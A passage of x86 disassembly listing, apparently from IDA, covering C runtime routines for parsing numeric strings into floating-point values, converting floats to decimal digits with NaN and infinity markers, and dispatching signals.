pop ebx
leave
retn
sub_41F340 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F407 proc near ; CODE XREF: sub_41E5AA+17�p
; sub_41E5D7+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_41F442: ; CODE XREF: sub_41F407+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_41F458
cmp cl, 9
jz short loc_41F458
cmp cl, 0Ah
jz short loc_41F458
cmp cl, 0Dh
jnz short loc_41F45B
loc_41F458: ; CODE XREF: sub_41F407+40�j
; sub_41F407+45�j ...
inc edi
jmp short loc_41F442
; ---------------------------------------------------------------------------
loc_41F45B: ; CODE XREF: sub_41F407+4F�j
push 4
pop esi
loc_41F45E: ; CODE XREF: sub_41F407+AE�j
; sub_41F407+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_41F6E1 ; default
; jumptable 0041F46A case 10
jmp off_41F8A8[eax*4] ; switch jump
loc_41F471: ; DATA XREF: .text:off_41F8A8�o
cmp bl, 31h ; jumptable 0041F46A case 0
jl short loc_41F482
cmp bl, 39h
jg short loc_41F482
loc_41F47B: ; CODE XREF: sub_41F407+C4�j
; sub_41F407+118�j
push 3
jmp loc_41F69F
; ---------------------------------------------------------------------------
loc_41F482: ; CODE XREF: sub_41F407+6D�j
; sub_41F407+72�j
cmp bl, byte_438600
jnz short loc_41F491
loc_41F48A: ; CODE XREF: sub_41F407+124�j
push 5
jmp loc_41F6D7
; ---------------------------------------------------------------------------
loc_41F491: ; CODE XREF: sub_41F407+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41F4B7
dec eax
dec eax
jz short loc_41F4AB
sub eax, 3
jnz loc_41F77A
jmp loc_41F53A
; ---------------------------------------------------------------------------
loc_41F4AB: ; CODE XREF: sub_41F407+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_41F45E
; ---------------------------------------------------------------------------
loc_41F4B7: ; CODE XREF: sub_41F407+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_41F45E
; ---------------------------------------------------------------------------
loc_41F4C0: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
cmp bl, 31h ; jumptable 0041F46A case 1
mov [ebp+var_10], edx
jl short loc_41F4CD
cmp bl, 39h
jle short loc_41F47B
loc_41F4CD: ; CODE XREF: sub_41F407+BF�j
cmp bl, byte_438600
jz loc_41F595
cmp bl, 2Bh
jz short loc_41F50F
cmp bl, 2Dh
jz short loc_41F50F
cmp bl, 30h
jz short loc_41F53A
loc_41F4E8: ; CODE XREF: sub_41F407+207�j
cmp bl, 43h
jle loc_41F77A
cmp bl, 45h
jle short loc_41F508
cmp bl, 63h
jle loc_41F77A
cmp bl, 65h
jg loc_41F77A
loc_41F508: ; CODE XREF: sub_41F407+ED�j
push 6
jmp loc_41F6D7
; ---------------------------------------------------------------------------
loc_41F50F: ; CODE XREF: sub_41F407+D5�j
; sub_41F407+DA�j ...
dec edi
push 0Bh
jmp loc_41F6D7
; ---------------------------------------------------------------------------
loc_41F517: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
cmp bl, 31h ; jumptable 0041F46A case 2
jl short loc_41F525
cmp bl, 39h
jle loc_41F47B
loc_41F525: ; CODE XREF: sub_41F407+113�j
cmp bl, byte_438600
jz loc_41F48A
cmp bl, 30h
jnz loc_41F6EF
loc_41F53A: ; CODE XREF: sub_41F407+9F�j
; sub_41F407+DF�j
mov eax, edx
jmp loc_41F45E
; ---------------------------------------------------------------------------
loc_41F541: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
mov [ebp+var_10], edx ; jumptable 0041F46A case 3
loc_41F544: ; CODE XREF: sub_41F407+184�j
cmp dword_4385FC, edx
jle short loc_41F55D
movzx eax, bl
push esi
push eax
call sub_418576
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F56B
; ---------------------------------------------------------------------------
loc_41F55D: ; CODE XREF: sub_41F407+143�j
mov ecx, off_4383F0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F56B: ; CODE XREF: sub_41F407+154�j
test eax, eax
jz short loc_41F58D
cmp [ebp+var_4], 19h
jnb short loc_41F585
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_41F588
; ---------------------------------------------------------------------------
loc_41F585: ; CODE XREF: sub_41F407+16C�j
inc [ebp+var_8]
loc_41F588: ; CODE XREF: sub_41F407+17C�j
mov bl, [edi]
inc edi
jmp short loc_41F544
; ---------------------------------------------------------------------------
loc_41F58D: ; CODE XREF: sub_41F407+166�j
cmp bl, byte_438600
jnz short loc_41F5FC
loc_41F595: ; CODE XREF: sub_41F407+CC�j
mov eax, esi
jmp loc_41F45E
; ---------------------------------------------------------------------------
loc_41F59C: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
cmp [ebp+var_4], 0 ; jumptable 0041F46A case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_41F5B5
loc_41F5A8: ; CODE XREF: sub_41F407+1AC�j
cmp bl, 30h
jnz short loc_41F5B5
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_41F5A8
; ---------------------------------------------------------------------------
loc_41F5B5: ; CODE XREF: sub_41F407+19F�j
; sub_41F407+1A4�j ...
cmp dword_4385FC, edx
jle short loc_41F5CE
movzx eax, bl
push esi
push eax
call sub_418576
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F5DC
; ---------------------------------------------------------------------------
loc_41F5CE: ; CODE XREF: sub_41F407+1B4�j
mov ecx, off_4383F0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F5DC: ; CODE XREF: sub_41F407+1C5�j
test eax, eax
jz short loc_41F5FC
cmp [ebp+var_4], 19h
jnb short loc_41F5F7
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_41F5F7: ; CODE XREF: sub_41F407+1DD�j
mov bl, [edi]
inc edi
jmp short loc_41F5B5
; ---------------------------------------------------------------------------
loc_41F5FC: ; CODE XREF: sub_41F407+18C�j
; sub_41F407+1D7�j
cmp bl, 2Bh
jz loc_41F50F
cmp bl, 2Dh
jz loc_41F50F
jmp loc_41F4E8
; ---------------------------------------------------------------------------
loc_41F613: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
cmp dword_4385FC, edx ; jumptable 0041F46A case 5
mov [ebp+var_24], edx
jle short loc_41F62F
movzx eax, bl
push esi
push eax
call sub_418576
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F63D
; ---------------------------------------------------------------------------
loc_41F62F: ; CODE XREF: sub_41F407+215�j
mov ecx, off_4383F0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F63D: ; CODE XREF: sub_41F407+226�j
test eax, eax
jz loc_41F6EF
mov eax, esi
jmp short loc_41F6A0
; ---------------------------------------------------------------------------
loc_41F649: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
lea ecx, [edi-2] ; jumptable 0041F46A case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_41F659
cmp bl, 39h
jle short loc_41F69D
loc_41F659: ; CODE XREF: sub_41F407+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41F6D5
dec eax
dec eax
jz short loc_41F6C9
sub eax, 3
jnz loc_41F77D
loc_41F66E: ; CODE XREF: sub_41F407+2A4�j
push 8
jmp short loc_41F6D7
; ---------------------------------------------------------------------------
loc_41F672: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
mov [ebp+var_20], edx ; jumptable 0041F46A case 8
loc_41F675: ; CODE XREF: sub_41F407+276�j
cmp bl, 30h
jnz short loc_41F67F
mov bl, [edi]
inc edi
jmp short loc_41F675
; ---------------------------------------------------------------------------
loc_41F67F: ; CODE XREF: sub_41F407+271�j
cmp bl, 31h
jl loc_41F77A
cmp bl, 39h
jg loc_41F77A
jmp short loc_41F69D
; ---------------------------------------------------------------------------
loc_41F693: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
cmp bl, 31h ; jumptable 0041F46A case 7
jl short loc_41F6A6
cmp bl, 39h
jg short loc_41F6A6
loc_41F69D: ; CODE XREF: sub_41F407+250�j
; sub_41F407+28A�j
push 9
loc_41F69F: ; CODE XREF: sub_41F407+76�j
pop eax
loc_41F6A0: ; CODE XREF: sub_41F407+240�j
dec edi
jmp loc_41F45E
; ---------------------------------------------------------------------------
loc_41F6A6: ; CODE XREF: sub_41F407+28F�j
; sub_41F407+294�j
cmp bl, 30h
jnz short loc_41F6EF
jmp short loc_41F66E
; ---------------------------------------------------------------------------
loc_41F6AD: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
cmp [ebp+arg_18], 0 ; jumptable 0041F46A case 11
jz short loc_41F6DD
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_41F6D5
dec eax
dec eax
jnz loc_41F77D
loc_41F6C9: ; CODE XREF: sub_41F407+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_41F45E
; ---------------------------------------------------------------------------
loc_41F6D5: ; CODE XREF: sub_41F407+258�j
; sub_41F407+2B8�j
push 7
loc_41F6D7: ; CODE XREF: sub_41F407+85�j
; sub_41F407+103�j ...
pop eax
jmp loc_41F45E
; ---------------------------------------------------------------------------
loc_41F6DD: ; CODE XREF: sub_41F407+2AA�j
push 0Ah
dec edi
pop eax
loc_41F6E1: ; CODE XREF: sub_41F407+5D�j
; sub_41F407+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0041F46A case 10
jz loc_41F77F
jmp loc_41F45E
; ---------------------------------------------------------------------------
loc_41F6EF: ; CODE XREF: sub_41F407+12D�j
; sub_41F407+238�j ...
mov edi, [ebp+arg_8]
jmp loc_41F77F
; ---------------------------------------------------------------------------
loc_41F6F7: ; CODE XREF: sub_41F407+63�j
; DATA XREF: .text:off_41F8A8�o
mov [ebp+var_20], 1 ; jumptable 0041F46A case 9
xor esi, esi
loc_41F700: ; CODE XREF: sub_41F407+339�j
cmp dword_4385FC, 1
jle short loc_41F718
movzx eax, bl
push 4
push eax
call sub_418576
pop ecx
pop ecx
jmp short loc_41F727
; ---------------------------------------------------------------------------
loc_41F718: ; CODE XREF: sub_41F407+300�j
mov ecx, off_4383F0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41F727: ; CODE XREF: sub_41F407+30F�j
test eax, eax
jz short loc_41F747
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_41F742
mov bl, [edi]
inc edi
jmp short loc_41F700
; ---------------------------------------------------------------------------
loc_41F742: ; CODE XREF: sub_41F407+334�j
mov esi, 1451h
loc_41F747: ; CODE XREF: sub_41F407+322�j
mov [ebp+var_1C], esi
loc_41F74A: ; CODE XREF: sub_41F407+371�j
cmp dword_4385FC, 1
jle short loc_41F762
movzx eax, bl
push 4
push eax
call sub_418576
pop ecx
pop ecx
jmp short loc_41F771
; ---------------------------------------------------------------------------
loc_41F762: ; CODE XREF: sub_41F407+34A�j
mov ecx, off_4383F0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41F771: ; CODE XREF: sub_41F407+359�j
test eax, eax
jz short loc_41F77A
mov bl, [edi]
inc edi
jmp short loc_41F74A
; ---------------------------------------------------------------------------
loc_41F77A: ; CODE XREF: sub_41F407+99�j
; sub_41F407+E4�j ...
dec edi
jmp short loc_41F77F
; ---------------------------------------------------------------------------
loc_41F77D: ; CODE XREF: sub_41F407+261�j
; sub_41F407+2BC�j
mov edi, ecx
loc_41F77F: ; CODE XREF: sub_41F407+2DD�j
; sub_41F407+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_41F867
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_41F7AB
cmp [ebp+var_45], 5
jl short loc_41F79F
inc [ebp+var_45]
loc_41F79F: ; CODE XREF: sub_41F407+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_41F7AE
; ---------------------------------------------------------------------------
loc_41F7AB: ; CODE XREF: sub_41F407+38D�j
mov eax, [ebp+var_C]
loc_41F7AE: ; CODE XREF: sub_41F407+3A2�j
cmp [ebp+var_4], 0
jbe loc_41F85D
loc_41F7B8: ; CODE XREF: sub_41F407+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_41F7C6
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_41F7B8
; ---------------------------------------------------------------------------
loc_41F7C6: ; CODE XREF: sub_41F407+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_41F340
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_41F7E5
neg eax
loc_41F7E5: ; CODE XREF: sub_41F407+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_41F7F0
add eax, [ebp+arg_10]
loc_41F7F0: ; CODE XREF: sub_41F407+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_41F7F8
sub eax, [ebp+arg_14]
loc_41F7F8: ; CODE XREF: sub_41F407+3EC�j
cmp eax, 1450h
jle short loc_41F82F
mov [ebp+var_2C], 1
loc_41F806: ; CODE XREF: sub_41F407+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_41F812: ; CODE XREF: sub_41F407+454�j
; sub_41F407+45E�j
cmp [ebp+var_2C], 0
jz short loc_41F878
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_41F88D
; ---------------------------------------------------------------------------
loc_41F82F: ; CODE XREF: sub_41F407+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_41F83F
mov [ebp+var_30], 1
jmp short loc_41F806
; ---------------------------------------------------------------------------
loc_41F83F: ; CODE XREF: sub_41F407+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_41FFF0
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_41F812
; ---------------------------------------------------------------------------
loc_41F85D: ; CODE XREF: sub_41F407+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_41F812
; ---------------------------------------------------------------------------
loc_41F867: ; CODE XREF: sub_41F407+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_41F88D
; ---------------------------------------------------------------------------
loc_41F878: ; CODE XREF: sub_41F407+40F�j
cmp [ebp+var_30], 0
jz short loc_41F88D
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_41F88D: ; CODE XREF: sub_41F407+426�j
; sub_41F407+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_41F407 endp
; ---------------------------------------------------------------------------
off_41F8A8 dd offset loc_41F471 ; DATA XREF: sub_41F407+63�r
dd offset loc_41F4C0 ; jump table for switch statement
dd offset loc_41F517
dd offset loc_41F541
dd offset loc_41F59C
dd offset loc_41F613
dd offset loc_41F649
dd offset loc_41F693
dd offset loc_41F672
dd offset loc_41F6F7
dd offset loc_41F6E1
dd offset loc_41F6AD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F8D8 proc near ; CODE XREF: sub_41E67B+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_41F93A
mov byte ptr [ebx+2], 2Dh
jmp short loc_41F93E
; ---------------------------------------------------------------------------
loc_41F93A: ; CODE XREF: sub_41F8D8+5A�j
mov byte ptr [ebx+2], 20h
loc_41F93E: ; CODE XREF: sub_41F8D8+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_41F964
test edi, edi
jnz short loc_41F964
cmp [ebp+arg_0], edi
jnz short loc_41F964
loc_41F94F: ; CODE XREF: sub_41F8D8+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_41FB62
; ---------------------------------------------------------------------------
loc_41F964: ; CODE XREF: sub_41F8D8+6C�j
; sub_41F8D8+70�j ...
cmp dx, si
jnz short loc_41F9E3
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_41F97D
cmp [ebp+arg_0], 0
jz short loc_41F98C
loc_41F97D: ; CODE XREF: sub_41F8D8+9D�j
test edi, 40000000h
jnz short loc_41F98C
push offset a1Snan ; "1#SNAN"
jmp short loc_41F9D2
; ---------------------------------------------------------------------------
loc_41F98C: ; CODE XREF: sub_41F8D8+A3�j
; sub_41F8D8+AB�j
test cx, cx
jz short loc_41F9A6
cmp edi, 0C0000000h
jnz short loc_41F9A6
cmp [ebp+arg_0], 0
jnz short loc_41F9CD
push offset a1Ind ; "1#IND"
jmp short loc_41F9B5
; ---------------------------------------------------------------------------
loc_41F9A6: ; CODE XREF: sub_41F8D8+B7�j
; sub_41F8D8+BF�j
cmp edi, eax
jnz short loc_41F9CD
cmp [ebp+arg_0], 0
jnz short loc_41F9CD
push offset a1Inf ; "1#INF"
loc_41F9B5: ; CODE XREF: sub_41F8D8+CC�j
lea eax, [ebx+4]
push eax
call sub_415A20
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_41F9C4: ; CODE XREF: sub_41F8D8+109�j
and [ebp+var_4], 0
jmp loc_41FB3B
; ---------------------------------------------------------------------------
loc_41F9CD: ; CODE XREF: sub_41F8D8+C5�j
; sub_41F8D8+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_41F9D2: ; CODE XREF: sub_41F8D8+B2�j
lea eax, [ebx+4]
push eax
call sub_415A20
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_41F9C4
; ---------------------------------------------------------------------------
loc_41F9E3: ; CODE XREF: sub_41F8D8+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_41FFF0
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_41FA44
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_41FDD0
pop ecx
pop ecx
loc_41FA44: ; CODE XREF: sub_41F8D8+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_41FA5E
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_41FA61
jmp loc_41F94F
; ---------------------------------------------------------------------------
loc_41FA5E: ; CODE XREF: sub_41F8D8+173�j
mov edi, [ebp+arg_C]
loc_41FA61: ; CODE XREF: sub_41F8D8+17F�j
cmp edi, 15h
jle short loc_41FA69
push 15h
pop edi
loc_41FA69: ; CODE XREF: sub_41F8D8+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_41FA7F: ; CODE XREF: sub_41F8D8+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_41F2E5
dec [ebp+arg_14]
pop ecx
jnz short loc_41FA7F
test esi, esi
jge short loc_41FAA9
neg esi
and esi, 0FFh
jle short loc_41FAA9
loc_41FA9C: ; CODE XREF: sub_41F8D8+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_41F313
dec esi
pop ecx
jnz short loc_41FA9C
loc_41FAA9: ; CODE XREF: sub_41F8D8+1B8�j
; sub_41F8D8+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_41FB06
mov [ebp+arg_C], ecx
loc_41FAB9: ; CODE XREF: sub_41F8D8+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_41F2E5
lea eax, [ebp+var_10]
push eax
call sub_41F2E5
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41F287
lea eax, [ebp+var_10]
push eax
call sub_41F2E5
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_41FAB9
mov eax, [ebp+arg_14]
loc_41FB06: ; CODE XREF: sub_41F8D8+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_41FB43
loc_41FB13: ; CODE XREF: sub_41F8D8+248�j
cmp eax, ecx
jb short loc_41FB26
cmp byte ptr [eax], 39h
jnz short loc_41FB22
mov byte ptr [eax], 30h
dec eax
jmp short loc_41FB13
; ---------------------------------------------------------------------------
loc_41FB22: ; CODE XREF: sub_41F8D8+242�j
cmp eax, ecx
jnb short loc_41FB2A
loc_41FB26: ; CODE XREF: sub_41F8D8+23D�j
inc eax
inc word ptr [ebx]
loc_41FB2A: ; CODE XREF: sub_41F8D8+24C�j
inc byte ptr [eax]
loc_41FB2C: ; CODE XREF: sub_41F8D8+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_41FB3B: ; CODE XREF: sub_41F8D8+F0�j
mov eax, [ebp+var_4]
loc_41FB3E: ; CODE XREF: sub_41F8D8+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41FB43: ; CODE XREF: sub_41F8D8+239�j
; sub_41F8D8+275�j
cmp eax, ecx
jb short loc_41FB53
cmp byte ptr [eax], 30h
jnz short loc_41FB4F
dec eax
jmp short loc_41FB43
; ---------------------------------------------------------------------------
loc_41FB4F: ; CODE XREF: sub_41F8D8+272�j
cmp eax, ecx
jnb short loc_41FB2C
loc_41FB53: ; CODE XREF: sub_41F8D8+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_41FB62: ; CODE XREF: sub_41F8D8+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_41FB3E
sub_41F8D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FB6B proc near ; CODE XREF: sub_41B42C+342F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_41FBD2
dec eax
dec eax
jz short loc_41FBC3
sub eax, 4
jz short loc_41FBC3
sub eax, 3
jz short loc_41FBC3
sub eax, 4
jz short loc_41FBB6
sub eax, 6
jz short loc_41FBA9
dec eax
jz short loc_41FB9C
or eax, 0FFFFFFFFh
jmp loc_41FC94
; ---------------------------------------------------------------------------
loc_41FB9C: ; CODE XREF: sub_41FB6B+27�j
mov esi, dword_46BDE4
mov eax, offset dword_46BDE4
jmp short loc_41FBDD
; ---------------------------------------------------------------------------
loc_41FBA9: ; CODE XREF: sub_41FB6B+24�j
mov esi, dword_46BDE0
mov eax, offset dword_46BDE0
jmp short loc_41FBDD
; ---------------------------------------------------------------------------
loc_41FBB6: ; CODE XREF: sub_41FB6B+1F�j
mov esi, dword_46BDE8
mov eax, offset dword_46BDE8
jmp short loc_41FBDD
; ---------------------------------------------------------------------------
loc_41FBC3: ; CODE XREF: sub_41FB6B+10�j
; sub_41FB6B+15�j ...
push edi
call sub_41FC98
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_41FBDD
; ---------------------------------------------------------------------------
loc_41FBD2: ; CODE XREF: sub_41FB6B+C�j
mov esi, dword_46BDDC
mov eax, offset dword_46BDDC
loc_41FBDD: ; CODE XREF: sub_41FB6B+3C�j
; sub_41FB6B+49�j ...
cmp esi, 1
jnz short loc_41FBE9
xor eax, eax
jmp loc_41FC94
; ---------------------------------------------------------------------------
loc_41FBE9: ; CODE XREF: sub_41FB6B+75�j
test esi, esi
jnz short loc_41FBF4
push 3
call sub_417858
loc_41FBF4: ; CODE XREF: sub_41FB6B+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_41FC06
cmp edi, 0Bh
jz short loc_41FC06
cmp edi, 4
jnz short loc_41FC2C
loc_41FC06: ; CODE XREF: sub_41FB6B+8F�j
; sub_41FB6B+94�j
mov ebx, dword_46BBB8
and dword_46BBB8, 0
cmp edi, ecx
jnz short loc_41FC5B
mov edx, dword_43AA6C
mov dword_43AA6C, 8Ch
mov [ebp+arg_0], edx
jmp short loc_41FC2F
; ---------------------------------------------------------------------------
loc_41FC2C: ; CODE XREF: sub_41FB6B+99�j
mov ebx, [ebp+arg_0]
loc_41FC2F: ; CODE XREF: sub_41FB6B+BF�j
cmp edi, ecx
jnz short loc_41FC5B
mov eax, dword_43AA60
mov ecx, dword_43AA64
add ecx, eax
cmp eax, ecx
jge short loc_41FC62
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:43A9F0h[edx*4]
loc_41FC50: ; CODE XREF: sub_41FB6B+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_41FC50
jmp short loc_41FC62
; ---------------------------------------------------------------------------
loc_41FC5B: ; CODE XREF: sub_41FB6B+AA�j
; sub_41FB6B+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_41FC70
loc_41FC62: ; CODE XREF: sub_41FB6B+D7�j
; sub_41FB6B+EE�j
push dword_43AA6C
push 8
call esi
pop ecx
pop ecx
jmp short loc_41FC7E
; ---------------------------------------------------------------------------
loc_41FC70: ; CODE XREF: sub_41FB6B+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_41FC7E
cmp edi, 4
jnz short loc_41FC91
loc_41FC7E: ; CODE XREF: sub_41FB6B+103�j
; sub_41FB6B+10C�j
cmp edi, 8
mov dword_46BBB8, ebx
jnz short loc_41FC91
mov eax, [ebp+arg_0]
mov dword_43AA6C, eax
loc_41FC91: ; CODE XREF: sub_41FB6B+111�j
; sub_41FB6B+11C�j
xor eax, eax
pop ebx
loc_41FC94: ; CODE XREF: sub_41FB6B+2C�j
; sub_41FB6B+79�j
pop edi
pop esi
pop ebp
retn
